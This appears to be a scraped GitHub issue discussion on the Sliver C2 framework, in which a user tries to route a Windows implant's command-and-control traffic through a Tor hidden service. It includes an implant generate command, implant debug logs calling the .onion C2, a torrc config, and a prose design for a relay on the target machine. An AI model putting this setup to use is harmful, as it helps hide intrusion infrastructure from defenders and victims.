Comments (2)
pixelBaron117
commented on July 1, 2024
generate --http [hidden].onion:6969?proxy=127.0.0.1:9050 -o windows -G -d -O dbg
sliver > jobs
ID Name Protocol Port Stage Profile
==== ====== ========== ====== ===============
11 http tcp 6969
output :
2024/05/22 20:35:30 session.go:172: Connecting -> http(s)://[hidden].onion:6969
2024/05/22 20:35:30 session.go:84: Next CC = https://[hidden].onion:6969?proxy=127.0.0.1:9050
2024/05/22 20:35:30 drivers_windows.go:36: Using go http driver
2024/05/22 20:35:30 transports.go:92: Yield c2 uri = 'https://[hidden].onion:6969?proxy=127.0.0.1:9050'
2024/05/22 20:35:30 gohttp.go:97: Force proxy "127.0.0.1:9050"
2024/05/22 20:35:30 httpclient.go:652: [http] segments = [], filename = rpc, ext = php
2024/05/22 20:35:30 crypto.go:217: TOTP Code (2024-05-22 18:35:30.2354917 +0000 UTC): [hidden]
2024/05/22 20:35:30 httpclient.go:339: [http] POST -> https://[hidden].onion:6969/rpc.html?b=[hidden]&sm=[hidden] (266 bytes)
2024/05/22 20:35:30 httpclient.go:345: [http] http response error: Post "https://[hidden].onion:6969/rpc.html?b=[hidden]&sm=[hidden]": dial tcp: lookup [hidden].onion: no such host
2024/05/22 20:35:30 drivers_windows.go:36: Using go http driver
2024/05/22 20:35:30 gohttp.go:97: Force proxy "127.0.0.1:9050"
2024/05/22 20:35:30 httpclient.go:652: [http] segments = [], filename = register, ext = php
2024/05/22 20:35:30 crypto.go:217: TOTP Code (2024-05-22 18:35:30.2394831 +0000 UTC): [hidden]
2024/05/22 20:35:30 httpclient.go:339: [http] POST -> http://[hidden].onion:6969/register.html?ch=[hidden]&u=[hidden] (266 bytes)
2024/05/22 20:35:30 httpclient.go:345: [http] http response error: Post "http://[hidden].onion:6969/register.html?ch=[hidden]&u=[hidden]": dial tcp: lookup [hidden].onion: no such host
2024/05/22 20:35:30 session.go:178: http(s) connection error Post "http://[hidden].onion:6969/register.html?ch=[hidden]&u=[hidden]": dial tcp: lookup [hidden].onion: no such host
2024/05/22 20:35:30 sliver.go:158: [session] failed to establish connection: Post "http://[hidden].onion:6969/register.html?ch=[hidden]&u=[hidden]": dial tcp: lookup [hidden].onion: no such host
2024/05/22 20:35:30 sliver.go:138: Reconnect sleep: 1m0s
It seems the proxy is correctly used, but the sessions can't connect to the hidden service.
The hidden service Tor configuration:
GNU nano 6.2 torrc
# This is the configuration for Tor
SocksPort 9050 #
# HiSer
HiddenServiceDir /var/lib/tor/hidden_service/
HiddenServicePort 6969 127.0.0.1:6969
Based on the debug output, the implant seems to behave correctly, using the proxy and sending HTTP requests. According to my information, the Tor proxy is compatible with standard HTTP requests. Therefore, I don't understand why it isn't working.
from sliver.
pixelBaron117
commented on July 1, 2024
While waiting for potential integration into Sliver, I've created a Python script that serves as a relay to route communications through the Tor network using an mTLS agent.
How It Works:
Agent Communication:
The Sliver agent is configured to communicate with 127.0.0.1:6666, thinking it is directly talking to the Sliver C2 server.
Proxy on the Target:
A Python proxy script runs on the target machine and listens on 127.0.0.1:6666 for incoming connections from the Sliver agent.
Redirection Through Tor:
The proxy script establishes a connection to the Sliver C2 server using the Tor network. This is done through a SOCKS5 proxy running on 127.0.0.1:9050 towards the hidden service (.onion address).
Data Forwarding:
The script forwards all data from the Sliver agent to the Sliver C2 server through Tor and sends back responses to the agent, ensuring seamless bidirectional communication.
Detailed Setup:
Sliver C2 Server:
The Sliver C2 server listens on port 9999 for incoming connections.
Tor Hidden Service:
Configure the hidden service to listen on port 9999 and forward traffic to port 9999 on the Sliver C2 server.
The .onion address of this hidden service is used by the proxy script to route traffic through Tor.
Python Proxy Script:
The proxy script runs on the target machine.
It listens on 127.0.0.1:6666 for connections from the Sliver agent.
When a connection is received, the proxy script uses PySocks to establish a connection to the hidden service address through the Tor network.
It then forwards all data from the Sliver agent to the Sliver C2 server through the Tor network and vice versa.
This setup allows the mTLS agent to route its communications securely through the Tor network without any modifications to the Sliver agent itself.
I am currently testing its robustness not sur if it will work great.....
from sliver.
Related Issues (20)
- `hashdump` disconnect session HOT 4
- Execute shell in batches HOT 1
- Client doesn't handle network interruptions gracefully HOT 3
- sliver-client console HOT 1
- Install one liner doesn't work on Arch Linux HOT 2
- mtls-server-ca-cert.pem certificate expired, can this be recovered HOT 2
- DNS job not starting
- AddMachineAccount in Chinese
- Stager shellcode generation fails on Kali VM on Apple Silicon (ARM) Mac HOT 2
- changing host header does not work HOT 7
- Armory update/install is not working as expected
- Unable to run DNS C2 on latest version HOT 2
- How can I remove rportfwd? HOT 2
- COFFLoader x86 release 1.0.14 uses libgcc_s_dw2-1.dll
- Ported Remote Ops Bof: Injection HOT 1
- compile it with make and run . /sliver-server,it says: zsh: exec format error: . /sliver-server. HOT 3
- go-assets.sh: /bin/bash^M: bad interpreter: No such file or directory HOT 1
- panic: runtime error: index out of range [1] with length 1 HOT 4
- Wg connectivity issues HOT 1
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from sliver.